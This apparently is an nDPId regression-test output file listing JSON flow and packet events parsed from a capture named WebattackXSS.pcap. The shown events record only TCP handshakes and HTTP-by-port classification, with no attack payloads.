-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347141111,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347141111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OEpAAD4GjYasEAABwKgKMtMYAFBIRqkCAAAAAKACchAH0QAAAgQFtAQCCAoBOZFIAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347141111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0xgJZZF8SEapA6AScSAHLAAAAgQFtAQCCAoD42K\/ATmRSAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1499347141112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347141112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OEtAAD4GjY2sEAABwKgKMtMYAFBIRqkDCWWRfYAQAOWmMgAAAQEICgE5kUkD42K\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347142412,"flow_last_seen":1499347142412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347142412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1499347142412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YBRAAD4GZbysEAABwKgKMtMmAFBNdfKaAAAAAKACchC3tQAAAgQFtAQCCAoBOZKOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1499347142413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347142413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0yYb67mHTXXym6AScSB7OgAAAgQFtAQCCAoD42QEATmSjgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1499347142413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347142413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YBVAAD4GZcOsEAABwKgKMtMmAFBNdfKbG+u5iIAQAOUaQgAAAQEICgE5ko4D42QE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347143676,"flow_last_seen":1499347143676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347143676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1499347143676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BvpAAD4GvtasEAABwKgKMtM0AFB9ypUwAAAAAKACchDjgAAAAgQFtAQCCAoBOZPKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1499347143676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347143676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0zTpUSjmfcqVMaAScSBpBAAAAgQFtAQCCAoD42VAATmTygEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1499347143677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347143677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BvtAAD4Gvt2sEAABwKgKMtM0AFB9ypUx6VEo54AQAOUIDAAAAQEICgE5k8oD42VA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347146267,"flow_last_seen":1499347146267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347146267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1499347146267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ydAAD4G1qisEAABwKgKMtNOAFAXjXl1AAAAAKACchBi1wAAAgQFtAQCCAoBOZZSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1499347146268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347146268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ006ckw3VF415dqAScSBNogAAAgQFtAQCCAoD42fIATmWUgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1499347146268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347146268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07yhAAD4G1q+sEAABwKgKMtNOAFAXjXl2nJMN1oAQAOXsqQAAAQEICgE5llID42fI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347147523,"flow_last_seen":1499347147523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347147523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1499347147523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jHlAAD4GOVesEAABwKgKMtNcAFBPnRvyAAAAAKACchCHAwAAAgQFtAQCCAoBOZeLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1499347147523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347147523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ01w4IOWQT50b86AScSD9SwAAAgQFtAQCCAoD42kCATmXiwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1499347147524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347147524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jHpAAD4GOV6sEAABwKgKMtNcAFBPnRvzOCDlkYAQAOWcUgAAAQEICgE5l4wD42kC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347150236,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150236,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ESlAAD4GtKesEAABwKgKMtN2AFB3vosbAAAAAKACchDs9wAAAgQFtAQCCAoBOZoyAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347150236,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ03aiL1kKd76LHKAScSCDEQAAAgQFtAQCCAoD42uoATmaMgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1499347150237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347150237,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ESpAAD4GtK6sEAABwKgKMtN2AFB3voscoi9ZC4AQAOUiGQAAAQEICgE5mjID42uo"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 